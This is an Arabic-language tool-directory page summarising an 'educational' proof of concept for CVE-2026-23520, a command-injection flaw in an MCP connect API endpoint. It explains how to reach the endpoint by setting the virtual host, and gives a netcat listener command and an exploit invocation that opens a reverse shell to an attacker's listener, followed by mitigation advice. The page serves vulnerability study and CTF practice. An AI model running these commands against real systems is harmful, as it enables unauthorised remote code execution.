Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-Educational-PoC-CVE-2026-23520 — 🎓 إثبات مفهوم تعليمي لـ CVE-2026-23520. مختبر تحليل الثغرات الأمنية والتخفيف المتحكم فيه. 🧪 | Kitploit
أدوات/GitHubGitHub/kikechans/-educational-poc-cve-2026-23520
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFالقيادة والسيطرةالتعلم والتعليم
GitHubkikechans/-educational-poc-cve-2026-23520

-Educational-PoC-CVE-2026-23520

🎓 إثبات مفهوم تعليمي لـ CVE-2026-23520. مختبر تحليل الثغرات الأمنية والتخفيف المتحكم فيه. 🧪

عرض المستودع
3منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23520: ثغرة تنفيذ الأوامر عن بُعد في Model Context Protocol (MCP) Connect - إثبات مفهوم تعليمي - Arcane

إخلاء مسؤولية: هذا المستودع والبرامج النصية الموجودة فيه مخصّصة حصريًا للأغراض التعليمية والأكاديمية فقط.

المعلومات المقدمة هنا تهدف إلى مساعدة الباحثين الأمنيين، ومدراء الأنظمة، والطلاب على فهم آليات ثغرات حقن الأوامر وتوجيه المضيف الافتراضي في بيئات المختبرات الخاضعة للتحكم (مثل منصات Capture The Flag).

لا تستخدم هذه الأداة أبدًا ضد أي نظام أو شبكة أو بنية تحتية دون إذن صريح ومكتوب من المالك. لا يتحمل المؤلفون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.


نظرة عامة على السياق والثغرة

يوفر هذا المستودع إثبات مفهوم (PoC) لاستغلال CVE-2026-23520 ضمن سياق تنفيذ Model Context Protocol (MCP) في بعض حِزم التطبيقات (مثل Arcane v1.13.0).

الثغرة

الثغرة هي خلل كلاسيكي من نوع حقن الأوامر. تقبل نقطة نهاية الواجهة البرمجية (/api/mcp/connect) حمولة JSON لتهيئة اتصال خادم جديد. تتضمن الحمولة كائن serverConfig يحتوي على حقلي command و args.

نظرًا لفشل التطبيق في تعقيم هذه الحقول بشكل صحيح قبل تنفيذها على نظام التشغيل المضيف، يمكن للمهاجم توفير أوامر bash ضارة (مثل قشرة عكسية) بدلاً من مسار خدمة شرعي.

الملاحظة المهمة (توجيه المضيف الافتراضي)

في العديد من بيئات النشر الواقعية أو بيئات CTF، يؤدي مجرد إرسال الاستغلال إلى عنوان IP الرئيسي إلى خطأ 404 Not Found. يحدث ذلك لأن المكوّن المعرض للخطر (مثل MCPJam Inspector) يُستضاف خلف وكيل عكسي (مثل Nginx) يوجّه حركة المرور بناءً على ترويسة Host.

يختلف إثبات المفهوم هذا عن الاستغلالات التقليدية من خلال السماح للمستخدم بتحديد المضيف الافتراضي (vhost) صراحةً لتجاوز قواعد توجيه الوكيل والوصول إلى التطبيق المعرض للخطر مباشرةً.

الاستخدام

يتطلب هذا البرنامج النصي Python 3 ومكتبة requests.

root@kitploit:~
pip install requests

الصيغة

root@kitploit:~
python3 exploit_vhost.py <target_ip> <target_port> <virtual_host> <listener_ip> <listener_port>

مثال (بيئة CTF)

  1. قم بإعداد مستمع netcat على جهازك:
root@kitploit:~
nc -lvnp 4444
  1. قم بتشغيل الاستغلال مع تحديد المضيف الافتراضي المخفي:
root@kitploit:~
python3 exploit_vhost.py 10.129.x.x 443 mcp.target.local 10.10.x.x 4444

ملاحظة: خطأ "Read timed out" متوقع ويشير إلى أن القشرة العكسية تم تنفيذها بنجاح وأنها تُبقي الاتصال مفتوحًا.

التخفيف

يجب على المدراء التأكد من تشغيل أحدث إصدار مُصَحَّح من البرنامج. إذا لم يكن التصحيح ممكنًا فورًا، فقيّد الوصول إلى نقطة النهاية /api/mcp/connect وتأكد من تطبيق تحقق صارم من المدخلات على جميع معاملات serverConfig.

تنزيل الأداة